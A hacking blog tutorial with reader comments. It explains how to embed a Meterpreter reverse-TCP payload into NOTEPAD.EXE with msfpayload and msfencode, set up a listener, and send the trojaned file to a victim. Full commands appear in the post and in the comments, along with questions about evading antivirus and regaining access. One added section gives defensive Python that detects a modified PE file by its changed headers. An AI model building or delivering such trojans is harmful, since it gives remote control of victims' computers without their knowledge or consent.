Type : Tutorial
Level : Beginner, Medium, Advanced
Have you ever imagined that when you click to open your Notepad application, it might contain a backdoor or malicious code? Or that when you start your Windows OS it also starts explorer.exe, but this explorer.exe contains a backdoor or malicious code? Embedding a backdoor into an EXE file isn't hard to do at all; in fact it's very easy. You can follow the tutorial below to prove that I'm right and it's easy :p LoL
1. Metasploit Framework 3 (or Metasploit v2)
2. Linux OS (or you can use BackTrack 5, which already includes the Metasploit Framework inside the operating system)
1. First of all, you should prepare your target EXE file. In this case I will use NOTEPAD.EXE.
2. Next, we use msfpayload to inject a Meterpreter reverse payload into our executable (NOTEPAD.EXE), encode it 5 times (5 iterations) using shikata_ga_nai, and save the backdoored file to the Desktop.
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.92 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
3. Because we selected a reverse Meterpreter payload, we need to set up the exploit handler to handle the connection back to our attacking machine. In this case the attacker uses IP address 192.168.8.92.
Go to the Metasploit console by typing msfconsole, and then run:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.92
LHOST => 192.168.8.92
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
Don't forget to change LHOST to your own IP address and LPORT to your desired local port.

4. The next step is to send our special NOTEPAD.EXE file to the victim. As soon as they download and open it, there's a Meterpreter shell on the victim's computer:
PWNED
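The flip side of step 2 is what a defender looks for: writing a payload into an existing executable changes the file's PE layout, typically by adding a section and moving the entry point into it. The following example is added here and is not part of the original tutorial; it builds two constructed, header-only PE images (a stand-in for the original NOTEPAD.EXE and for a modified copy), parses their headers without any third-party library, and reports the structural differences. A payload written in place over existing code can leave the headers untouched, so pair this check with a hash comparison against a known-good copy.

```python
import struct
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER layout, 40 bytes

def build_pe(entry_point, sections):
    """Minimal header-only PE32 image (constructed test data); sections = [(name, virtual_address, virtual_size)]."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)        # e_lfanew: PE signature at 0x40
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry_point)   # AddressOfEntryPoint sits at +16
    opt = opt.ljust(224, b"\0")                                        # standard PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    hdrs = b"".join(struct.pack(SECTION_HDR, n.encode().ljust(8, b"\0"), vs, va, vs, 0, 0, 0, 0, 0, 0x60000020)
                    for n, va, vs in sections)
    return dos + b"PE\0\0" + coff + opt + hdrs

def parse_pe(data):
    """Return (entry_point_rva, [(name, virtual_address, virtual_size), ...]) read from the PE headers."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    entry = struct.unpack_from("<I", data, e_lfanew + 24 + 16)[0]         # AddressOfEntryPoint in optional header
    off = e_lfanew + 24 + struct.unpack_from("<H", data, e_lfanew + 20)[0]  # SizeOfOptionalHeader -> first section
    sections = []
    for _ in range(nsections):
        name, vsize, va = struct.unpack_from("<8sII", data, off)
        sections.append((name.rstrip(b"\0").decode(), va, vsize))
        off += 40
    return entry, sections

def section_of(rva, sections):
    """Name of the section whose virtual range contains rva, or None if it lies outside every section."""
    return next((n for n, va, vs in sections if va <= rva < va + vs), None)

def compare_pe(original, modified):
    """List the structural differences: sections added, sections resized, and a moved entry point."""
    o_entry, o_secs = parse_pe(original)
    m_entry, m_secs = parse_pe(modified)
    known = {(n, va) for n, va, _ in o_secs}
    findings = [f"new section {n} at RVA {va:#x} ({vs:#x} bytes)" for n, va, vs in m_secs if (n, va) not in known]
    for (n1, va1, vs1), (n2, va2, vs2) in zip(o_secs, m_secs):
        if (n1, va1) == (n2, va2) and vs1 != vs2:
            findings.append(f"section {n1} size changed {vs1:#x} -> {vs2:#x}")
    if o_entry != m_entry:
        findings.append(f"entry point moved {o_entry:#x} -> {m_entry:#x} "
                        f"(now in {section_of(m_entry, m_secs)}, was in {section_of(o_entry, o_secs)})")
    return findings

# Constructed stand-ins: a known-good image with .text/.data, and a copy that gained a section holding a new entry point.
ORIGINAL = build_pe(0x1010, [(".text", 0x1000, 0x8000), (".data", 0x9000, 0x1000)])
MODIFIED = build_pe(0xA000, [(".text", 0x1000, 0x8000), (".data", 0x9000, 0x1000), (".new", 0xA000, 0x400)])
if __name__ == "__main__":
    print("\n".join(compare_pe(ORIGINAL, MODIFIED)))
```

To check a real file, read both copies with `open(path, "rb").read()` and pass them to compare_pe.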
You can also learn how to apply this method to attack over the internet, but please read my previous tutorial about the logic of attacking a network outside the LAN / attacking over the WAN first.
Hope it's useful for you. Any comment or correction? Please drop your comment below.
I cannot make it… my result looks like this:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[-] x86/shikata_ga_nai failed: No such file or directory - /root/Desktop/NOTEPAD.EXE
[-] No encoders succeeded.
#Tarish
Did you already put the original NOTEPAD.EXE on your desktop?
Thanks.. now it's working fine..
Can you explain how to hack a remote PC with Metasploit or SET? I have never hacked a remote PC; although I installed a backdoor, my BackTrack 5 machine would not get any incoming connection from the remote machine. I am using VMware Workstation.. please explain this matter..
Waiting for your better tutorial… thanks..
#tarish
I wrote tons of that kind of content on my blog…. see the Tutorial section.
Can I open the victim's computer again after I shut down, without sending him anything?
#mehdi
You can view this tutorial http://vishnuvalentino.com/computer/5-steps-to-set-up-backdoor-after-successfully-compromising-target-using-backtrack-5/
Asswhole, fucking scams!!!!
THIS CONNECTS TO HIS IP!! AND THEN LET'S HIM ACCESS YOUR PC! I AM GONNA SCREW UP YOUR IP!! ASSWHOLE AND THIS SITE IS GOING DOWN!!!
^
Above poster is so lame.
On another note, notepad2.exe just dies when I try to open it on the victim (test) Windows machine: "program stopped working". Do you know why?
#tester
Maybe he just started learning about computer security.
Yep, just ignore it.
Are you using Windows 7 as your victim? If so, maybe the Win 7 DEP and ASLR prevent it from working. You can try it on Windows XP.
Hey, I managed to exploit my XP computer! I want to try it on a Win7 computer (x64)… is it possible? Any help, any idea plzz
#alpha
I haven't tried it on Win7 x64, but maybe it has a different infrastructure from x86…
Hey, thanks for the quick reply!
Have you done it on Win 7 32-bit (x86)? Does it work on it, or does it simply refuse to work on Win7? What do you think about Vista?
#alpha
No, it can't on Windows 7, it has DEP to prevent exploit execution.. it works on Windows XP
I realized that the session dies after the victim closes our backdoor file, in this case Notepad,
and the victim's AV (Norton 360) shows an alert that this file is not safe to run.
Any ways to solve those problems?
And I couldn't use your provided code; I'm facing "no encoder found" and blah blah errors with it.
I use this, which I found on some blogs:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=5610 R | /pentest/exploits/framework3/msfencode -t exe -x /root/Desktop/notepad.exe -k -o /root/Desktop/calc_backdoor.exe -e x86/shikata_ga_nai -c 5
Any guides? Solutions?
Oh, I forgot: thanks in advance.
Awesome blog and articles mate, keep it up.
When the exploit is run it displays "Handler failed to bind to (ip address)". Why is that?
-DeusIgni
Also, when a flash drive containing NOTEPAD2.EXE is opened on the target, the system deletes it because it has been detected as a trojan. Is there any way to overcome this without turning off the antivirus or having the target download the file? -DeusIgni
#DeusIgni
Yep, that's true, it's detected by antivirus… but my purpose here was the logic of how to create a backdoor…
Which was a very astute tutorial, thank you for that.
-DeusIgni